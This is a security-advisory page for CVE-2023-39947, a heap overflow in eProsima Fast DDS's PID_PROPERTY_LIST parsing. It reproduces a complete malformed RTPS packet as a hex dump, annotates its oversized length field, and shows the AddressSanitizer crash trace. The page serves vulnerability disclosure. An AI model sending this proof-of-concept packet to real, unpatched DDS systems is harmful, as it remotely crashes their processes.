Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-39947: Another heap overflow in push_back_helper

eprosima Fast DDS is a C++ implementation of the Data Distribution Service standard of the Object Management Group. Prior to versions 2.11.1, 2.10.2, 2.9.2, and 2.6.6, even after the fix at commit 3492270, malformed PID_PROPERTY_LIST parameters cause heap overflow at a different program counter. This can remotely crash any Fast-DDS process. Versions 2.11.1, 2.10.2, 2.9.2, and 2.6.6 contain a patch for this issue.

CVE
Open in Source
#linux#c++

Even after the fix in 3492270, malformed PID_PROPERTY_LIST parameters cause heap overflow at a different program counter.

0000   52 54 50 53 02 02 ff ff 01 0f 45 d2 b3 f5 58 b9
0010   01 00 00 00 15 05 cc 00 00 00 10 00 00 01 00 c7
0020   00 01 00 c2 00 00 00 00 01 00 00 00 00 03 00 00
0030   15 00 04 00 02 02 00 00 16 00 04 00 01 0f 00 00
0040   50 00 10 00 01 0f 11 3e f6 42 cd 90 00 00 00 00
0050   00 00 01 c1 32 00 18 00 01 00 00 00 f2 1c 00 00
0060   00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 0f
0070   31 00 18 00 01 00 00 00 f3 1c 00 00 00 00 00 00
0080   00 00 00 00 00 00 00 00 0a 00 00 0f 02 00 08 00
0090   14 00 00 00 00 00 00 00 58 00 04 00 3f 0c 00 00
00a0   62 00 10 00 0a 00 00 00 70 75 62 6c 69 73 68 65
00b0   72 00 00 00 59 00 28 00 01 00 00 00 11 00 00 00
00c0   50 41 52 54 49 43 49 50 41 4e 54 5f 54 59 50 45
00d0   00 00 00 00 f3 ff ff ff 53 49 4d 50 4c 45 00 00
00e0   01 00 00 00


59 00 // PID_PROPERTY_LIST
28 00 // 40 bytes
01 00 // CDR_LE
00 00 // CDR opt

11 00 00 00 // size: 17
50 41 52 54 // <- data + padding
49 43 49 50 // -
41 4e 54 5f // -
54 59 50 45 // -
00 00 00 00 // ->

f3 ff ff ff // size: 4294967283
53 49 4d 50 4c 45 00 00 // data (insufficient)



=================================================================
==4118777==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000036020 at pc 0x000000474523 bp 0x7f2dfb4fb7a0 sp 0x7f2dfb4faf60
WRITE of size 17 at 0x602000036020 thread T3
    #0 0x474522 in memcpy (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x474522)
    #1 0x7f2e0147b492 in eprosima::fastdds::dds::ParameterPropertyList_t::push_back_helper(unsigned char const*, unsigned int, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/include/fastdds/dds/core/policy/ParameterTypes.hpp:1518:15
    #2 0x7f2e0147b3e8 in eprosima::fastdds::dds::ParameterPropertyList_t::push_back(unsigned char const*, unsigned int, unsigned char const*, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/include/fastdds/dds/core/policy/ParameterTypes.hpp:1448:25
    #3 0x7f2e014a59a8 in eprosima::fastdds::dds::ParameterSerializer<eprosima::fastdds::dds::ParameterPropertyList_t>::read_content_from_cdr_message(eprosima::fastdds::dds::ParameterPropertyList_t&, eprosima::fastrtps::rtps::CDRMessage_t*, unsigned short) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterSerializer.hpp:685:28
    #4 0x7f2e014a65b9 in eprosima::fastdds::dds::ParameterSerializer<eprosima::fastdds::dds::ParameterPropertyList_t>::read_from_cdr_message(eprosima::fastdds::dds::ParameterPropertyList_t&, eprosima::fastrtps::rtps::CDRMessage_t*, unsigned short) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterSerializer.hpp:62:47
    #5 0x7f2e014bf0e2 in eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short)::operator()(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:571:111
    #6 0x7f2e014c064a in bool eprosima::fastdds::dds::ParameterList::readParameterListfromCDRMsg<eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short)>(eprosima::fastrtps::rtps::CDRMessage_t&, eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short), bool, unsigned int&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterList.hpp:133:31
    #7 0x7f2e014bf5bb in eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:652:58
    #8 0x7f2e0148c420 in eprosima::fastrtps::rtps::PDPListener::onNewCacheChangeAdded(eprosima::fastrtps::rtps::RTPSReader*, eprosima::fastrtps::rtps::CacheChange_t const*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/discovery/participant/PDPListener.cpp:104:54
    #9 0x7f2e0112fa37 in eprosima::fastrtps::rtps::StatelessReader::change_received(eprosima::fastrtps::rtps::CacheChange_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/reader/StatelessReader.cpp:329:52
    #10 0x7f2e01130cc7 in eprosima::fastrtps::rtps::StatelessReader::processDataMsg(eprosima::fastrtps::rtps::CacheChange_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/reader/StatelessReader.cpp:557:33
    #11 0x7f2e0114ecc8 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*)::operator()(eprosima::fastrtps::rtps::RTPSReader*) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:202:39
    #12 0x7f2e01156309 in void eprosima::fastrtps::rtps::MessageReceiver::findAllReaders<eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*)>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*) const&) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:668:25
    #13 0x7f2e0114ed11 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:205:19
    #14 0x7f2e0115fee6 in void std::__invoke_impl<void, void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>(std::__invoke_memfun_deref, void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/invoke.h:73:46
    #15 0x7f2e0115f279 in std::__invoke_result<void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>::type std::__invoke<void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>(void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/invoke.h:95:40
    #16 0x7f2e0115e3b4 in void std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::__call<void, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, 0ul, 1ul, 2ul>(std::tuple<eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>&&, std::_Index_tuple<0ul, 1ul, 2ul>) /usr/include/c++/9/functional:400:24
    #17 0x7f2e0115d230 in void std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::operator()<eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, void>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/functional:484:24
    #18 0x7f2e0115bfad in std::_Function_handler<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)> >::_M_invoke(std::_Any_data const&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/std_function.h:300:37
    #19 0x7f2e0115a250 in std::function<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::operator()(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) const /usr/include/c++/9/bits/std_function.h:688:14
    #20 0x7f2e01152ef1 in eprosima::fastrtps::rtps::MessageReceiver::proc_Submsg_Data(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastrtps::rtps::SubmessageHeader_t*) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:841:35
    #21 0x7f2e0114fa21 in eprosima::fastrtps::rtps::MessageReceiver::processCDRMsg(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::CDRMessage_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:418:45
    #22 0x7f2e01171827 in eprosima::fastrtps::rtps::ReceiverResource::OnDataReceived(unsigned char const*, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/network/ReceiverResource.cpp:132:27
    #23 0x7f2e012c2166 in eprosima::fastdds::rtps::UDPChannelResource::perform_listen_operation(eprosima::fastrtps::rtps::Locator_t) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPChannelResource.cpp:70:47
    #24 0x7f2e012c617c in void std::__invoke_impl<void, void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>(std::__invoke_memfun_deref, void (eprosima::fastdds::rtps::UDPChannelResource::*&&)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*&&, eprosima::fastrtps::rtps::Locator_t&&) /usr/include/c++/9/bits/invoke.h:73:46
    #25 0x7f2e012c6028 in std::__invoke_result<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>::type std::__invoke<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>(void (eprosima::fastdds::rtps::UDPChannelResource::*&&)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*&&, eprosima::fastrtps::rtps::Locator_t&&) /usr/include/c++/9/bits/invoke.h:95:40
    #26 0x7f2e012c5f38 in void std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> >::_M_invoke<0ul, 1ul, 2ul>(std::_Index_tuple<0ul, 1ul, 2ul>) /usr/include/c++/9/thread:244:26
    #27 0x7f2e012c5ebe in std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> >::operator()() /usr/include/c++/9/thread:251:31
    #28 0x7f2e012c5e8f in std::thread::_State_impl<std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> > >::_M_run() /usr/include/c++/9/thread:195:13
    #29 0x7f2e00149de3  (/lib/x86_64-linux-gnu/libstdc++.so.6+0xd6de3)
    #30 0x7f2e005ef608 in start_thread /build/glibc-SzIz7B/glibc-2.31/nptl/pthread_create.c:477:8
    #31 0x7f2dffe34132 in clone /build/glibc-SzIz7B/glibc-2.31/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:95

0x602000036020 is located 0 bytes to the right of 16-byte region [0x602000036010,0x602000036020)
allocated by thread T3 here:
    #0 0x4d9582 in calloc (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x4d9582)
    #1 0x7f2e0105275e in eprosima::fastrtps::rtps::SerializedPayload_t::reserve(unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/include/fastdds/rtps/common/SerializedPayload.h:172:34
    #2 0x7f2e0147b3d2 in eprosima::fastdds::dds::ParameterPropertyList_t::push_back(unsigned char const*, unsigned int, unsigned char const*, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/include/fastdds/dds/core/policy/ParameterTypes.hpp:1444:28
    #3 0x7f2e014a59a8 in eprosima::fastdds::dds::ParameterSerializer<eprosima::fastdds::dds::ParameterPropertyList_t>::read_content_from_cdr_message(eprosima::fastdds::dds::ParameterPropertyList_t&, eprosima::fastrtps::rtps::CDRMessage_t*, unsigned short) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterSerializer.hpp:685:28
    #4 0x7f2e014a65b9 in eprosima::fastdds::dds::ParameterSerializer<eprosima::fastdds::dds::ParameterPropertyList_t>::read_from_cdr_message(eprosima::fastdds::dds::ParameterPropertyList_t&, eprosima::fastrtps::rtps::CDRMessage_t*, unsigned short) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterSerializer.hpp:62:47
    #5 0x7f2e014bf0e2 in eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short)::operator()(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:571:111
    #6 0x7f2e014c064a in bool eprosima::fastdds::dds::ParameterList::readParameterListfromCDRMsg<eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short)>(eprosima::fastrtps::rtps::CDRMessage_t&, eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool)::'lambda'(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastdds::dds::ParameterId_t const&, unsigned short), bool, unsigned int&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/core/policy/ParameterList.hpp:133:31
    #7 0x7f2e014bf5bb in eprosima::fastrtps::rtps::ParticipantProxyData::readFromCDRMessage(eprosima::fastrtps::rtps::CDRMessage_t*, bool, eprosima::fastrtps::rtps::NetworkFactory const&, bool) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/data/ParticipantProxyData.cpp:652:58
    #8 0x7f2e0148c420 in eprosima::fastrtps::rtps::PDPListener::onNewCacheChangeAdded(eprosima::fastrtps::rtps::RTPSReader*, eprosima::fastrtps::rtps::CacheChange_t const*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/builtin/discovery/participant/PDPListener.cpp:104:54
    #9 0x7f2e0112fa37 in eprosima::fastrtps::rtps::StatelessReader::change_received(eprosima::fastrtps::rtps::CacheChange_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/reader/StatelessReader.cpp:329:52
    #10 0x7f2e01130cc7 in eprosima::fastrtps::rtps::StatelessReader::processDataMsg(eprosima::fastrtps::rtps::CacheChange_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/reader/StatelessReader.cpp:557:33
    #11 0x7f2e0114ecc8 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*)::operator()(eprosima::fastrtps::rtps::RTPSReader*) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:202:39
    #12 0x7f2e01156309 in void eprosima::fastrtps::rtps::MessageReceiver::findAllReaders<eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*)>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)::'lambda'(eprosima::fastrtps::rtps::RTPSReader*) const&) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:668:25
    #13 0x7f2e0114ed11 in eprosima::fastrtps::rtps::MessageReceiver::process_data_message_without_security(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:205:19
    #14 0x7f2e0115fee6 in void std::__invoke_impl<void, void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>(std::__invoke_memfun_deref, void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/invoke.h:73:46
    #15 0x7f2e0115f279 in std::__invoke_result<void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>::type std::__invoke<void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>(void (eprosima::fastrtps::rtps::MessageReceiver::*&)(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), eprosima::fastrtps::rtps::MessageReceiver*&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/invoke.h:95:40
    #16 0x7f2e0115e3b4 in void std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::__call<void, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, 0ul, 1ul, 2ul>(std::tuple<eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&>&&, std::_Index_tuple<0ul, 1ul, 2ul>) /usr/include/c++/9/functional:400:24
    #17 0x7f2e0115d230 in void std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::operator()<eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&, void>(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/functional:484:24
    #18 0x7f2e0115bfad in std::_Function_handler<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&), std::_Bind<void (eprosima::fastrtps::rtps::MessageReceiver::* (eprosima::fastrtps::rtps::MessageReceiver*, std::_Placeholder<1>, std::_Placeholder<2>))(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)> >::_M_invoke(std::_Any_data const&, eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) /usr/include/c++/9/bits/std_function.h:300:37
    #19 0x7f2e0115a250 in std::function<void (eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&)>::operator()(eprosima::fastrtps::rtps::EntityId_t const&, eprosima::fastrtps::rtps::CacheChange_t&) const /usr/include/c++/9/bits/std_function.h:688:14
    #20 0x7f2e01152ef1 in eprosima::fastrtps::rtps::MessageReceiver::proc_Submsg_Data(eprosima::fastrtps::rtps::CDRMessage_t*, eprosima::fastrtps::rtps::SubmessageHeader_t*) const /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:841:35
    #21 0x7f2e0114fa21 in eprosima::fastrtps::rtps::MessageReceiver::processCDRMsg(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::CDRMessage_t*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/messages/MessageReceiver.cpp:418:45
    #22 0x7f2e01171827 in eprosima::fastrtps::rtps::ReceiverResource::OnDataReceived(unsigned char const*, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastrtps::rtps::Locator_t const&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/network/ReceiverResource.cpp:132:27
    #23 0x7f2e012c2166 in eprosima::fastdds::rtps::UDPChannelResource::perform_listen_operation(eprosima::fastrtps::rtps::Locator_t) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPChannelResource.cpp:70:47
    #24 0x7f2e012c617c in void std::__invoke_impl<void, void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>(std::__invoke_memfun_deref, void (eprosima::fastdds::rtps::UDPChannelResource::*&&)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*&&, eprosima::fastrtps::rtps::Locator_t&&) /usr/include/c++/9/bits/invoke.h:73:46
    #25 0x7f2e012c6028 in std::__invoke_result<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>::type std::__invoke<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t>(void (eprosima::fastdds::rtps::UDPChannelResource::*&&)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*&&, eprosima::fastrtps::rtps::Locator_t&&) /usr/include/c++/9/bits/invoke.h:95:40
    #26 0x7f2e012c5f38 in void std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> >::_M_invoke<0ul, 1ul, 2ul>(std::_Index_tuple<0ul, 1ul, 2ul>) /usr/include/c++/9/thread:244:26
    #27 0x7f2e012c5ebe in std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> >::operator()() /usr/include/c++/9/thread:251:31
    #28 0x7f2e012c5e8f in std::thread::_State_impl<std::thread::_Invoker<std::tuple<void (eprosima::fastdds::rtps::UDPChannelResource::*)(eprosima::fastrtps::rtps::Locator_t), eprosima::fastdds::rtps::UDPChannelResource*, eprosima::fastrtps::rtps::Locator_t> > >::_M_run() /usr/include/c++/9/thread:195:13
    #29 0x7f2e00149de3  (/lib/x86_64-linux-gnu/libstdc++.so.6+0xd6de3)

Thread T3 created by T0 here:
    #0 0x4c376c in pthread_create (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x4c376c)
    #1 0x7f2e0014a0a8 in std::thread::_M_start_thread(std::unique_ptr<std::thread::_State, std::default_delete<std::thread::_State> >, void (*)()) (/lib/x86_64-linux-gnu/libstdc++.so.6+0xd70a8)
